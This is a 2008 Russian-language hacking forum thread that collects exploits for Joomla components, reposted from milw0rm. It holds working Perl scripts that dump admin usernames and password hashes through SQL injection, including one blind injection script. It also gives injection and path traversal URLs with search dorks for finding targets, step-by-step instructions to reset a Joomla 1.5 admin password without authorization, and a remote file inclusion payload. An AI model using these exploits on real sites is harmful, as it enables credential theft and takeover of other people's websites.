HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Joomla Component altas v 1.0 Multiple Remote SQL Injection
  #1  
Старый 05.07.2008, 14:06
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию Joomla Component altas v 1.0 Multiple Remote SQL Injection

Joomla Component altas v 1.0 Multiple Remote SQL Injection


Код:
#!/usr/bin/perl -w
#[*] Dork : index.php?option=com_altas
system("color f");
print "\t\t========================================================\n\n";
print "\t\t#                   Viva Islam    	                  #\n\n";
print "\t\t========================================================\n\n";
print "\t\t# Joomla Component altas v 1 multiple SQL Injection 	  #\n\n";
print "\t\t========================================================\n\n";
print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	          	  #\n\n";
print "\t\t========================================================\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/joomla/): ";
	chomp(my $target=<STDIN>);

$uname="username";
$magic="jos_users";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "index.php?option=com_altas&mes=hsmx&ano=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8 from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){
       
		print "\n[+] Admin User : $1";
}
$host2 = $target . "index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users--";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
		print "\n[+] Admin Hash : $1\n\n";
		print "#   Exploit succeed!  #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}

# coded  by Houssamix From H-T Team

# milw0rm.com [2008-07-04]

Последний раз редактировалось .Slip; 05.07.2008 в 14:54.. Причина: учимся пользоваться BB тегами
 
Ответить с цитированием

  #2  
Старый 08.07.2008, 17:34
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

Component Agora Forum 1.0.4 Acropolis rus

vuln code:
/moderate.php
PHP код:
$result $db->query('SELECT id FROM '.$db->prefix.'posts WHERE topic_id='.$_GET['ptid'].' ORDER BY posted LIMIT 1'); 
vuln code:
/my_uploads.php
PHP код:
$db->query('UPDATE '.$db->prefix.'users SET upload=\''.$upload.'\' WHERE id='.$_GET['id']) or error(sprintf($lang_uploadile['err_insert'],$conf_name), __FILE____LINE__$db->error()); 
Download:
Код:
http://freedom-ru.net/component/option,com_docman/task,doc_download/gid,41/Itemid,105/


ZAMUT (c)
__________________
в строю
 
Ответить с цитированием

Joomla Component DT Register Remote SQL injection
  #3  
Старый 17.07.2008, 22:23
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию Joomla Component DT Register Remote SQL injection

Joomla Component DT Register Remote SQL injection

Код:
[*] Author: His0k4 [ALGERIAN HaCkeR]
[*] Dork: inurl:com_DTRegister eventId
[*] Vendor:http://www.dthdevelopment.com/components/dt-register.html
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example:http://[TARGET]/[Path]/index.php?option=com_dtregister &eventId=-12
UNION SELECT concat(username,0x3a,password) FROM 
jos_users&task=pay_options&Itemid=138
[*] Greetings  : All friends & muslims HaCkeRs
                 www.dz-secure.com
          
----------------------------------------------------------------------------

# milw0rm.com [2008-07-16]
 
Ответить с цитированием

  #4  
Старый 23.07.2008, 22:08
The matrix
Reservists Of Antichat - Level 6
Регистрация: 09.07.2008
Сообщений: 102
Провел на форуме:
1744345

Репутация: 573
Отправить сообщение для The matrix с помощью ICQ
По умолчанию

Продукт-Joomla
Компонент -wap4joomla
found by ImpLex & Microsoft Sam
exploit
Код:
#!/usr/bin/perl -w
print
"\t\t
 ################################################################
 ############ This exploit created by ImpLex ICQ: 444-979 #######
 ############             from WHACK.RU                   #######
 ############               WHACK.RU                      #######
 ############ wapmain.php remote sql injection exploit    #######
 ############              LETS GO!!!!                    #######
 ################################################################\n\n";
use LWP::UserAgent;
print "\nEnter your target and folder fith wapversion(http://site.ru/wap): ";
        chomp(my $target=<STDIN>);
print "\nEnter number (0-first user probably admin)(1-10000000000 - other users): ";
        chomp(my $number=<STDIN>);
print "\nEnter table name with users(default jos_users(recomended) or mos_users or users) ";
        chomp(my $table1=<STDIN>);


print "\n[+] connecting to ... ".$target."";
$new = LWP::UserAgent->new() or die "fucking browser does not work\n";
$new->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/wapmain.php?option=onews&action=link&id=-1+union+select+1,2,3,concat(111222,0x3a3a3a,username,0x3b,password,0x3a3a3a,111222),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+".$table1."+limit+".$number.",1--";
$result = $new->request(HTTP::Request->new(GET=>$host));
$ans = $result->content;
if ($ans =~ /111222:::(.*?):::111222/){
                print "\n[+] User;password : $1";
                print "\n[+] password = md5(md5:salt) or md5";
                print "\n[+] target has been hacked";
                print "\n[+] If password-md5(md5:salt) => Then user - admin";
                print "\n[+] If password-md5 => Then it usual user";
}
else{print "\n[-] Exploit Failed. Search new bugs or exploit:( \n";}
 
Ответить с цитированием

  #5  
Старый 01.08.2008, 03:45
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

компонент com_imagebrowser

просматриваем директории на сервере

пример:
index.php?option=com_imagebrowser&folder=../../../../
 
Ответить с цитированием

Joomla Component EZ Store Blind SQL Injection Exploit
  #6  
Старый 04.08.2008, 14:07
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию Joomla Component EZ Store Blind SQL Injection Exploit

Joomla Component EZ Store Blind SQL Injection Exploit
Код:
#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to  viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                  \n";
    print "   ################################################################\n";
  print "   #   Joomla Component EZ Store Blind SQL Injection Exploit      #\n";
  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                            #\n";
  print "   #                                                              #\n";
  print "   #   Conctact: His0k4.hlm[at]gamil.com                          #\n";
  print "   #   Greetz:   All friends & muslims HacKeRs                    #\n";
  print "   #   Greetz2:  http://www.dz-secure.com                         #\n";
  print "   #                                                              #\n";
  print "   #   Dork:    inurl:com_ezstore                                 #\n";
  print "   #   Usage:   perl ezstore.pl host path <options>               #\n";
  print "   #   Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2  #\n";
  print "   #                                                              #\n";
  print "   #   Options:                                                   #\n";
  print "   #     -t    Valid  procuct id                                  #\n";
  print "   #     -c    Category value of the following  product id        #\n";
  print "   ################################################################\n";

  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $cid     = $ARGV[2];
my $pid     = $ARGV[3];

my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");

print "[~] Exploiting...\n";

if($options{"c"})
{
  $cid = $options{"c"};
}

if($options{"p"})
{
  $pid = $options{"p"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $cid, $pid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $cid, $pid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $cid   = shift;
  my $pid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"x"})
  {
    $ua->proxy('http', "http://".$options{"x"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "viewcategory&catid=".$cid."";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-08-03]
 
Ответить с цитированием

  #7  
Старый 12.08.2008, 19:43
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Agora 1.0.4 Acropolis Rus
google-> inurl: option=com_agora
PHP код:
$task trimmosGetParam$_REQUEST'task'"" ) );

if (
$task)
{
    require (
$agora_path "/$task.php");
}
else
{
    require (
$agora_path "/index.php");

null байт не прокатит из-за trim, можно подключать аминские скритпты в которых нет проверки, единственный плюс обходим _VALID_MOS в скриптах,
также пригодится если на жертве есть другие скрипты или если кривые настройки на серваке пожно инклюдить скрипты у соседей
 
Ответить с цитированием

  #8  
Старый 13.08.2008, 00:41
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию

Цитата:
null байт не прокатит из-за trim,
да щас прям - http://php.su/functions/?trim

../../../../../../../../etc/./passwd%00fucked_trim_bypass
 
Ответить с цитированием

Joomla 1.5.x Remote Admin Password Change
  #9  
Старый 13.08.2008, 16:17
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию Joomla 1.5.x Remote Admin Password Change

Joomla 1.5.x Remote Admin Password Change

Код:
File : /components/com_user/controller.php

#####################################################################################
Line : 379-399
 
	function confirmreset()
	{
		// Check for request forgeries
		JRequest::checkToken() or die( 'Invalid Token' );

		// Get the input
		$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1} 
                  
		// Get the model
		$model = &$this->getModel('Reset');

		// Verify the token
		if ($model->confirmReset($token) === false)   < --- {2}
		{
			$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
			$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
			return false;
		}

		$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
	}
	
#####################################################################################
	
File : /components/com_user/models/reset.php

Line: 111-130 	
	
	
	
	function confirmReset($token)
	{
		global $mainframe;

		$db	= &JFactory::getDBO();
		$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3} 

		// Verify the token
		if (!($id = $db->loadResult()))
		{
			$this->setError(JText::_('INVALID_TOKEN'));
			return false;
		}

		// Push the token and user id into the session
		$mainframe->setUserState($this->_namespace.'token',	$token);
		$mainframe->setUserState($this->_namespace.'id',	$id);

		return true;
	}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]

Последний раз редактировалось Rubaka; 13.08.2008 в 16:20..
 
Ответить с цитированием

Flash Tree Gallery
  #10  
Старый 04.11.2008, 08:56
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию Flash Tree Gallery

================================================== ================================================== ==============


[o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability

Software : com_treeg version 1.0
Vendor : http://justjoomla.net/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com


================================================== ================================================== ==============


[o] Vulnerable file

administrator/components/com_treeg/admin.treeg.php

include( "$mosConfig_live_site/components/com_treeg/about.html" );



[o] Exploit

http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]


================================================== ================================================== ==============


[o] Greetz

MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
VOP Crew [ Vrs-hCk OoN_BoY Paman ]
H312Y yooogy mousekill }^-^{ kaka11 martfella
skulmatic olibekas ulga Cungkee k1tk4t str0ke


================================================== ================================================== ==============

# milw0rm.com [2008-11-01]
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Cms Cawabunga PHP 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ